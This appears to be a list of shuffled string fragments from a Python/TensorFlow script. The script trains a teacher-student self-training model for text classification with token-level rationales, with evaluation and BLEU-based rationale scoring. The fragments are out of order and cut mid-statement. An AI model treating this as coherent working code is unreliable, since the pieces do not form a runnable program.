{}\".format(X_negation_sample[\"input_ids\"][:5])) y_mean, y_var,", "batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:], X_conf[:,0], np.ones((len(y_batch)))]) # class_weight=class_weight) if 'fine_tune_teacher' in", "word in temp_p: if word in 
temp_t: ct+=1 temp_t.remove(word) else: fp+=1 tp +=ct", "task_acc, test_acc, r_acc = out[3], out[4], out[5] logger.info (\"Test token acc for run", "test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0)[-3] elif type_ == 'joint': #", "np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) #y_rat =", "range(unsup_epochs): logger.info (\"Starting loop {}\".format(epoch)) if type_ == 'mtl': test_acc = model.evaluate(X_dev, [y_dev[:,0],", "loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0],", "rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) with strategy.scope(): loss_weights = [1.0, 1.0,", "(\"Model file loaded from {}\".format(model_file)) break elif 'mtl' in type_ : logger.info(y_train.shape) model.fit(x=X_train,", "in sample_scheme: logger.info (\"Sampling uniformly\") if unsup_size < len(X_unlabeled_sample['input_ids']): '''X_unlabeled_sample, y_pred = {\"input_ids\":", "= np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) logger.info(\"Best task", "= {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size]}, y[:train_size] X_dev, y_dev", "elif type_ == 'joint': logger.info(type_) def custom_loss(y_true, y_pred): logger.info(y_pred) return 
kb.mean(y_true*y_pred, axis=-1) with", "#model = model_student logger.info(y_batch.shape) model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus,", "in type_: acc, y_pred = model.predict(X_unlabeled_sample, batch_size=256) y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat", "= tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) with strategy.scope(): loss_weights = [1.0, 1.0, 1.0, 1.0] ''' if '_noexp'", "sklearn.metrics import precision_recall_fscore_support logger = logging.getLogger('STRationale') def create_learning_rate_scheduler(max_learn_rate=5e-5, end_learn_rate=1e-7, warmup_epoch_count=10, total_epoch_count=90): def lr_scheduler(epoch):", "restore_best_weights=True)]) #, sample_weight=[X_conf[:,0], X_conf[:,1:]]) elif type_ == 'joint': logger.info(type_) def custom_loss(y_true, y_pred): logger.info(y_pred)", "kb import tensorflow_addons as tfa from focal_loss import BinaryFocalLoss, SparseCategoricalFocalLoss import random from", "in range(len(test_pred)): temp_p, temp_t, ct = [],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] for j", "= task_acc model.save_weights(model_file_best) #_student = deepcopy(model) val_acc = task_acc #model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0],", "logger.info(\"Class predictions shape {}\".format(class_acc.shape)) logger.info(\"Teacher model best score (macro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='macro'))) logger.info(\"Teacher", "= np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) temp = model.evaluate(X_test, [y_test[:,0],", "{\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} elif 'joint' 
in type_: acc = acc[:,None]", "#re-weight rationales X_conf[:,1:] = np.where(log_rationale>0, log_rationale, 0.000000001) if 'norm' in type_: X_conf[:,1:] =", "adapted from UST (https://github.com/microsoft/UST) \"\"\" from collections import defaultdict from sklearn.utils import shuffle", "in range(unsup_epochs): logger.info (\"Starting loop {}\".format(epoch)) if type_ == 'mtl': test_acc = model.evaluate(X_dev,", "model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))],", "''' if 'mtl' in type_: logger.info (\"Best validation acc for base model {}:", "''' if test_acc > max_test_acc: max_test_acc = test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:],", "y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0) elif 'mtl' in type_: temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]],", "file loaded from {}\".format(model_file)) continue if 'mtl' in type_ : acc, y_pred =", "\"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": attention_mask_r} #mask tokens that are not rationales u-r if '_neg'", "import logging import math import models import numpy as np import os, sys", "'mtl' in type_: temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0) logger.info(\"Print acc (task) for", "model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=unsup_epochs,", "'attention_mask_neg':X_unlabeled['attention_mask_neg'][indices]}, y_pred[indices] elif 'joint' in type_: X_unlabeled_sample, y_pred = 
{'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices],", "y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices], 'input_ids_neg':X_unlabeled['input_ids_neg'][indices], 'token_type_ids_neg':X_unlabeled['token_type_ids_neg'][indices],", "in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) def custom_loss(y_true, y_pred): cce", "'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier': None}, loss_weights=loss_weights) if counter == 0: logger.info(model.summary()) model_file = os.path.join(model_dir,", "elif '_neg' in type_: out = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.full((len(y_test), len(labels)), 1/len(labels))])", "model.predict(X_test) class_acc, test_pred, r_acc = out[0], out[1], out[2] class_acc = np.argmax(class_acc, axis=-1) logger.info(\"Class", "y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-3] out1", "model): {} \".format(score4/len(pred))) best_loss = np.inf data = [] for i in range(len(X_test[\"input_ids\"])):", "\"token_type_ids_r\": X_sample['token_type_ids'][indices], \"attention_mask_r\": X_sample['attention_mask'][indices]} if '_neg' in type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\":", "patience=5, restore_best_weights=True)]) # class_weight=class_weight) elif 'joint_neg' in 
type_: logger.info(\"Training for without rationales\") with", "loss : {}\".format(counter, task_acc)) if 'mtl' in type_: class_acc = model.predict(X_test)[0] test_pred =", "= model.predict(X_test) acc1, y_pred1, r_acc1 = out1[0], out1[1], out1[2] y_pred1 = np.argmax(y_pred1, axis=-1)", "axis=-1) acc1 = np.argmax(acc1, axis=-1) r_acc1 = np.argmax(r_acc1, axis=-1) logger.info(\"Model performance for token", "= np.argmax(r_acc, axis=-1) logger.info(\"Best task acc score: {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) logger.info(\"Best token acc", "set (student model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales on test set (student", "r_acc1 = out1[0], out1[1], out1[2] y_pred1 = np.argmax(y_pred1, axis=-1) acc1 = np.argmax(acc1, axis=-1)", "\".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales on test set (student model): {} \".format(score4/len(pred))) data", "file loaded from {}\".format(model_file)) break elif 'mtl' in type_ : logger.info(y_train.shape) model.fit(x=X_train, y=[y_train[:,0],", "y_batch[indices] if 'joint' in type_: X_rationale_batch = {\"input_ids_r\": X_sample['input_ids'][indices], \"token_type_ids_r\": X_sample['token_type_ids'][indices], \"attention_mask_r\": X_sample['attention_mask'][indices]}", "0.0] else: loss_weights = [0.5, 0.5] with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#,", "unsup_size: indx = indx[:unsup_size] logger.info(\"Shape of predicted labels for class {} : {}\".format(i,", "in type_: acc = acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices][:, 1:]), axis=1) logger.info(\"y_batch shape:", "model): {} \".format(score4/len(pred))) data = [] for i in range(len(X_test[\"input_ids\"])): text = 
tokenizer.decode(X_test[\"input_ids\"][i])", "model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on test set (student model): {}", "y_neg_dev], verbose=0)[-3] out1 = model.predict(X_test) acc1, y_pred1, r_acc1 = out1[0], out1[1], out1[2] y_pred1", "range(len(test_pred)): temp_p, temp_t, ct = [],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] for j in", "y_batch[:, 0], np.full((len(y_batch),len(labels)), 1/len(labels))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]),", "+= y_test[i].sum() truth_0+= max_seq_length-truth_1 pred.append(' '.join(temp_p)) truth.append(' '.join(temp_t)) for word in temp_p: if", "= task_acc model.save_weights(model_file_best) #_student = deepcopy(model) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))],", "{}\".format(i, len(indx))) indices.extend(indx) indices = np.asarray(indices) #indices = np.random.choice(len(X_unlabeled_sample['input_ids']), unsup_size, replace=False) X_batch, y_batch", "y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices]}, y_pred[indices] else:", "model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales on test set (teacher model): {}", "y_dev, y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] ''' if val_loss < best_loss: best_loss = val_loss model.save_weights(model_file_best)", "X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]} #logger.info (X_unlabeled_sample[\"input_ids\"][:5]) if 'joint' in type_: 
ids =", "\"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} ''' probs = y_val[indices] X_conf = np.ones((len(y_batch), max_seq_length)) X_conf[:,0]", "model logger.info (\"Model file loaded from {}\".format(model_file)) break elif 'mtl' in type_ :", "np.ones(len(y_test))], verbose=0) elif 'mtl' in type_: temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0) logger.info(\"Print", "'_neg' in type_: out = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.full((len(y_test), len(labels)), 1/len(labels))]) task_acc,", "X_dev, y_dev logger.info(\"X Train Shape: {} {}\".format(X_train[\"input_ids\"].shape, y_train.shape)) logger.info(\"X Dev Shape: {} {}\".format(X_dev[\"input_ids\"].shape,", "= 0, 0, 0 pred_1, pred_0, truth_1, truth_0 = 0, 0, 0, 0", "1] #fix hardcoding labels = set(y[:,0]) logger.info (\"Class labels {}\".format(labels)) #split X and", "return kb.mean(y_true*y_pred, axis=-1) with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),", "acc = np.argmax(acc, axis=-1) elif 'joint' in type_: out = model.predict(X_unlabeled, batch_size=64) acc,", "elif '_neg' in type_ : y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:], y_train[:,0],", "y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:], y_train[:,0], y_neg], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0],", "acc (token) {}\".format(test_acc)) logger.info (\"Val acc (task) {}\".format(task_acc)) logger.info (\"Test acc (task) 
{}\".format(test_task_acc))", "X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]} if 'joint' in type_: X_rationale_batch", "from {}\".format(model_file)) break elif 'mtl' in type_ : logger.info(y_train.shape) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True,", "tf.print(tf.size(y_true), tf.size(y_pred)) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]),", "\"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:]}, y[train_size:] else: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\":", "in type_: loss_weights = [1.0, 0.0, 0.0, 0.0] elif '_no_suffcomp' in type_: loss_weights", "for run {} : {}\".format(counter, test_acc)) logger.info (\"Best Test task acc for run", "type_: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size],", "{}\".format(counter, val_loss)) if val_loss[0] < best_validation_loss: best_base_model = model best_validation_loss = val_loss[0] model", "precision_recall_fscore_support logger = logging.getLogger('STRationale') def create_learning_rate_scheduler(max_learn_rate=5e-5, end_learn_rate=1e-7, warmup_epoch_count=10, total_epoch_count=90): def lr_scheduler(epoch): if epoch", "(task) {}\".format(task_acc)) max_task_acc = task_acc best_val_acc = 
task_acc model.save_weights(model_file_best) #_student = deepcopy(model) val_acc", "predicted labels for class {} : {}\".format(i, len(indx))) indices.extend(indx) indices = np.asarray(indices) #indices", "out = model.evaluate(X_test, [y_test[:,0], y_test, y_test[:,0], np.ones(len(y_test))]) task_acc, test_acc, r_acc = out[3], out[4],", "y_pred #np.argmax(y_pred, axis=-1) logger.info(\"Printing prediction data on student model for run {}: {}\".format(counter,", "range(len(cls)): X_conf[i,0] = class_weight[cls[i][0]]*X_conf[i,0] #logger.info (\"Weights {}\".format(X_conf[:10])) logger.info(\"X_connf shape: {}\".format(X_conf.shape)) if 'mtl' in", "with open(os.path.join(model_dir, 'rationale_output_test_'+type_+'.json'), 'w') as f: json.dump(data, f) logger.info (\"Best accuracy (task) across", "in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = [1.0, 1.0,", "logger.info (\"Sampling uniformly\") if unsup_size < len(X_unlabeled_sample['input_ids']): '''X_unlabeled_sample, y_pred = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\":", "validation loss best_base_model = None best_validation_loss = np.inf for counter in range(N_base): #original", "X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size], \"input_ids_neg\":X[\"input_ids_neg\"][:train_size], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][:train_size], \"attention_mask_neg\":X[\"attention_mask_neg\"][:train_size]}, y[:train_size] X_dev, y_dev =", "0.0 #logger.info(l1_loss) return cce_loss + 0.01*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce =", "#.flatten() acc = np.argmax(acc, axis=-1) elif 'joint' in type_: out = model.predict(X_unlabeled, batch_size=64)", "def 
train_model(max_seq_length, X, y, X_test, y_test, X_unlabeled, model_dir, tokenizer, sup_batch_size=4, unsup_batch_size=32, unsup_size=4096, sample_size=16384,", "type_ : y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:], y_train[:,0], y_neg], shuffle=True, epochs=sup_epochs,", "tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i]) temp = dict() temp['text'] = ' '.join(text) temp['truth'] = truth[i] temp['pred'] =", "y_test[:,0], np.ones(len(y_test))], verbose=0)[-3] if '_neg' in type_: y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test", "as kb import tensorflow_addons as tfa from focal_loss import BinaryFocalLoss, SparseCategoricalFocalLoss import random", "y_batch[:, 0], np.ones(len(y_batch))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5,", "= SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_mtl(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels),", "val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[0] if task_acc > max_task_acc: logger.info", "model.predict(X_unlabeled, batch_size=256) #y_val = np.amax(acc, axis=-1) #y_rat = np.amax(y_pred, axis=-1) y_pred = np.argmax(y_pred,", "#X_conf = np.ones((len(X_batch['input_ids']), max_seq_length)) for i in range(len(cls)): X_conf[i,0] = class_weight[cls[i][0]]*X_conf[i,0] #logger.info (\"Weights", "_placeholder_labels = np.empty((y_train.shape[0], y_train.shape[0])) model.fit(x=X_train, y=[y_train[:,0], y_train, y_train[:,0], np.ones(len(y_train))], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0],", 
"callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) elif 'joint_neg' in type_: logger.info(\"Training for without rationales\")", "np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:], X_conf[:,0], np.ones((len(y_batch)))]) # class_weight=class_weight)", "logger.info(\"BLEU-2 score of rationales on test set (student model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score", "test set (teacher model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales on test set", "logger.info(\"BLEU-4 score of rationales on test set (teacher model): {} \".format(score4/len(pred))) best_loss =", "= X, y X_dev, y_dev = X_dev, y_dev logger.info(\"X Train Shape: {} {}\".format(X_train[\"input_ids\"].shape,", "in type_: out = y_train acc, y_pred, r_acc = y_train[:,0], y_train[:,1:], y_train[:,0] y_val", "= np.concatenate((acc[indices], y_pred), axis=1) acc = acc[:,None] y_batch = np.concatenate((acc, y_pred), axis=1) logging.info(\"y_batch", "np.argmax(class_acc, axis=-1) elif 'joint' in type_: out = model.predict(X_test) class_acc, test_pred, r_acc =", "logging.getLogger('STRationale') def create_learning_rate_scheduler(max_learn_rate=5e-5, end_learn_rate=1e-7, warmup_epoch_count=10, total_epoch_count=90): def lr_scheduler(epoch): if epoch < warmup_epoch_count: res", "y_train[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) #, sample_weight=[X_conf[:,0], X_conf[:,1:]])", "of rationales on test set (student model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of 
rationales", "dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) loss_weights = [1.0, 1.0, 1.0, 1.0] if '_noexp' in type_:", "from transformers import * import logging import math import models import numpy as", "= out[3], out[4], out[5] elif 'joint' in type_: out = model.evaluate(X_test, [y_test[:,0], y_test,", "= model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0)[-3] elif type_ == 'joint': # or", "out[1], out[2] #y_val = np.amax(acc, axis=-1) #y_rat = np.amax(y_pred, axis=-1) y_pred = np.argmax(y_pred,", "{} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales on test set (student model): {} \".format(score2/len(pred)))", "on test set (teacher model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales on test", "max_seq_length)) for i in range(len(cls)): X_conf[i,0] = class_weight[cls[i][0]]*X_conf[i,0] #logger.info (\"Weights {}\".format(X_conf[:10])) logger.info(\"X_connf shape:", "in type_: ids = [] attention_mask_r = np.ones((len(y_pred), max_seq_length)) attention_mask_r[:,1:] = np.array(y_pred) #logger.info(y_pred.shape)", "if '_noexp' in type_: loss_weights = [1.0, 0, 0, 0] if '_no_suffcomp' in", "{}\".format(labels)) #split X and y to train and dev with valid_split if valid_split", "X[\"attention_mask\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:]}, y[train_size:] else:", "X_test, y_test, X_unlabeled, model_dir, tokenizer, sup_batch_size=4, unsup_batch_size=32, unsup_size=4096, sample_size=16384, TFModel=TFBertModel, Config=BertConfig, pt_teacher_checkpoint='bert-base-uncased', sample_scheme='easy_bald_class_conf',", "score of rationales on test set (teacher model): {} \".format(score4/len(pred))) best_loss = np.inf", "= out[3], out[4], out[5] 
logger.info (\"Test token acc for run {} : {}\".format(counter,", "1/len(labels))]) elif 'joint' in type_: _placeholder_labels = np.empty((y_train.shape[0], y_train.shape[0])) model.fit(x=X_train, y=[y_train[:,0], y_train, y_train[:,0],", "y_test[:,0], average='micro'))) logger.info(\"Best token acc score: {}\".format(precision_recall_fscore_support(y_pred, y_test[:,1:], average='macro'))) pred, truth = [],", "X_unlabeled_sample['attention_mask'][indices]}, y_pred[indices] if type_ == 'decoupled' or ('joint' in type_): X_sample = {\"input_ids\":", "#indices = np.random.choice(len(X_unlabeled_sample['input_ids']), unsup_size, replace=False) X_batch, y_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\":", "(epoch + 1) else: res = max_learn_rate*math.exp(math.log(end_learn_rate/max_learn_rate)*(epoch-warmup_epoch_count+1)/(total_epoch_count-warmup_epoch_count+1)) return float(res) learning_rate_scheduler = tf.keras.callbacks.LearningRateScheduler(lr_scheduler, verbose=1)", "= ' '.join(text) temp['truth'] = truth[i] temp['pred'] = pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp)", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = None if '_noexp' in type_: loss_weights = [1.0, 0.0] else:", ">= max_best_acc: max_best_acc = test_task_acc model_file = os.path.join(model_dir, \"model_token_{}_{}.h5\".format(epoch, sample_scheme)) model_file_task = os.path.join(model_dir,", "'not_rationale_task_classifier': custom_loss_neg}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) X_batch['input_ids_r'], 
X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'],", "= tp/(tp+fn+0.0000001) logger.info(\"Token-level: {}\".format((tp)/(tp+(0.5*(fp+fn))))) logger.info(\"Rationale coverage (recall): {}\".format(r)) logger.info(\"Token Precision: {}\".format(p)) logger.info(\"Token overlap:", "train_model(max_seq_length, X, y, X_test, y_test, X_unlabeled, model_dir, tokenizer, sup_batch_size=4, unsup_batch_size=32, unsup_size=4096, sample_size=16384, TFModel=TFBertModel,", "with strategy.scope(): if 'mtl' in type_: rat_loss = None if 'focal' in type_:", "axis=-1) logger.info(\"Printing prediction data on teacher model for run {}: {}\".format(counter, test_pred)) tp,", "{} \".format(score4/len(pred))) data = [] for i in range(len(X_test[\"input_ids\"])): text = tokenizer.decode(X_test[\"input_ids\"][i]) temp", "tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc',", "model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") elif type_ == 'joint': rat_loss", "#acc = acc[:,None] #y_batch = np.concatenate((acc[indices], y_pred), axis=1) acc = acc[:,None] y_batch =", "= np.where(attention_mask_r==0, 1, 0) negation_mask[:,0] = 1 X_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']),", "with strategy.scope(): 
model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]],", "'norm' in type_: X_conf[:,1:] = tf.nn.softmax(X_conf[:,1:], axis=0) #X_conf = np.ones((len(X_batch['input_ids']), max_seq_length)) for i", "SparseCategoricalFocalLoss(gamma=2, reduction=tf.keras.losses.Reduction.NONE) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]),", "y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:]}, y[train_size:] else: X_train, y_train =", "'mtl': test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-1] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], 